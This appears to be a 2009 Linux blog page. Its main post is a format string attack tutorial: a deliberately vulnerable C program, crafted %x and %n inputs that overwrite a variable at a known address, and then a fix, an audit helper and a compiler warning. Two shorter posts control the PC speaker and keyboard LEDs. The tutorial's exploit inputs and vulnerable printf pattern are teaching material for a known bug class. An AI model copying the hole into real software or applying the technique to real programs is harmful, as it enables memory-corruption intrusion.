2009-12-25 Linux Format String Attack 1
A format string attack targets C functions that take a format string. printf() is the best-known one; there are other
functions that support format strings.
C code that misuses printf():
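    #include <stdio.h>
    #include <string.h>

    int main( int argc, char **argv )
    {
        static int i = 0;
        char text[1000];

        if (argc < 2)
            return 1;
        /* bounded copy of the first argument */
        strncpy(text, argv[1], sizeof(text) - 1);
        text[sizeof(text) - 1] = '\0';
        printf("%.8x\n",&i);    /* address of i (32-bit build) */
        printf("No way it never will works because value of i=%d\n",i);
        printf( text );         /* the bug: user input used as the format string */
        printf("\nValue of i=%d\n",i);
        return 0;
    }

The first line of output is the address of the static variable i.
Then we print the value of i and call printf() with the program's first argument as the format string,
and then print the value of i again.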
Run: ./e1 'Halolo'
Output:
    08049674
    No way it never will works because value of i=0
    Halolo
    Value of i=0
Run: ./e1 'Halolo%s'
Output:
    08049674
    No way it never will works because value of i=0
    Halolo(null)
    Value of i=0
Run: ./e1 $'\x74\x96\x04\x08_%x'
Output:
    08049674
    No way it never will works because value of i=0
    t�_0
    Value of i=0
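Read about %n in format strings: it stores the number of characters printed so far into the int that the corresponding argument points to.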
Run: ./e1 $'\x74\x96\x04\x08_%x_%n'
Output:
    08049674
    No way it never will works because value of i=0
    Segmentation fault
Run: ./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
Output:
    08049674
    No way it never will works because value of i=0
    t�_0_8_40_4_4_
    Value of i=16
Run: ./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
Output:
    08049674
    No way it never will works because value of i=0
    t�_0_8_40_4_000...0004_    (the fifth value, 4, zero-padded to 1201 digits by %.1201x)
    Value of i=1216
Now you can write almost any value into i.
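Added example, not code from the original post: the fix for e1 (user text passed as a "%s" argument), a small audit helper, and the %n arithmetic behind i=16 and i=1216 reproduced with explicit arguments. The names render_safe, has_conversion and n_count are hypothetical, and "AAAA" stands in for the four address bytes.

```c
#include <stdio.h>
#include <string.h>

/* Fix for e1: the untrusted text is an argument, never the format. */
int render_safe(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}

/* Audit helper (hypothetical name): 1 if s holds a conversion
 * specifier, i.e. a '%' that is not part of a literal "%%". */
int has_conversion(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') { s++; continue; }   /* "%%" prints one '%' */
        return 1;
    }
    return 0;
}

/* %n stores the number of characters produced so far. Same layout as
 * the post's runs, but with explicit arguments: "AAAA" stands in for
 * the 4 address bytes (constructed), and 0, 8, 0x40, 4, 4 are the
 * values visible in the post's output. */
int n_count(int precision)
{
    char buf[2048];
    int count = -1;
    snprintf(buf, sizeof buf, "AAAA_%x_%x_%x_%x_%.*x_%n",
             0u, 8u, 0x40u, 4u, precision, 4u, &count);
    return count;
}

int main(void)
{
    char out[64];
    render_safe(out, sizeof out, "Halolo_%x_%n");
    printf("safe: %s (conversion in input: %d)\n",
           out, has_conversion("Halolo_%x_%n"));
    printf("count: %d, padded: %d\n", n_count(1), n_count(1201));
    return 0;
}
```

Building e1 with gcc's -Wformat -Wformat-security flags reports the printf( text ) call at compile time.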
2009-12-14 Linux PC speaker
The PC speaker can play any sound you want. Here is a small PC speaker player. Set the notes, set the time
delay, and you are ready. Run this code as root if nothing happens.
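    #include <fcntl.h>
    #include <time.h>
    #include <unistd.h>
    #include <sys/ioctl.h>
    #include <sys/syscall.h>
    #include <linux/kd.h>

    /* note, song and msleep() are not shown in the original post;
       these are minimal stand-ins so that the player compiles. */
    typedef struct { int n; int t; } note;  /* n: 1193180/Hz, t: delay in ms */
    static note song[] = { {1193180/440, 300}, {1193180/494, 300},
                           {1193180/523, 300}, {0, 0} };  /* n == 0 ends the song */

    static void msleep(int ms)
    {
        struct timespec t = { ms / 1000, (ms % 1000) * 1000000L };
        nanosleep(&t, NULL);
    }

    int main()
    {
        int rc,i;
        note *curent_song;
        curent_song = song;
        rc = syscall(SYS_open,"/dev/console",O_WRONLY,7*8*64+7*8+7); //open console
        if (rc < 0) rc = 1;   // open failed: fall back to stdout
        ioctl( rc, KIOCSOUND , 0 );
        ioctl( rc , KDSETLED , 7 );
        i = 0;
        while ( curent_song[i].n != 0 )
        {
            ioctl( rc , KIOCSOUND , curent_song[i].n );  // start the tone
            msleep( (curent_song[i].t) );
            ioctl( rc , KDSETLED , i&0x0007 );           // blink the LEDs along
            i++;
        }
        ioctl( rc , KDSETLED , 0 );
        ioctl( rc, KIOCSOUND , 0 );                      // sound off
        return 0;
    }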
2009-12-12 Linux keyboard LED
Send a few bits and flash the LEDs on your keyboard.
Run it as root. The program reports no errors, whatever happens.
Usage:
kbled [NumLock] [CapsLock] [ScrLock]
kbled 0 0 0
    #include <stdlib.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/ioctl.h>
    #include <sys/syscall.h>
    #include <linux/kd.h>

    int main( int argc , char **argv )
    {
        int rc,i;
        if (argc != 4) exit(0);
        rc = syscall(SYS_open,"/dev/console",O_WRONLY,7*64+7*8+7); //open console
        if (rc < 0) rc = 1;   // open failed: fall back to stdout
        // KDSETLED bits: 1 = ScrLock, 2 = NumLock, 4 = CapsLock
        i = (argv[1][0]-'0')*2+(argv[2][0]-'0')*4+(argv[3][0]-'0');
        ioctl( rc , KDSETLED , i );
        return 0;
    }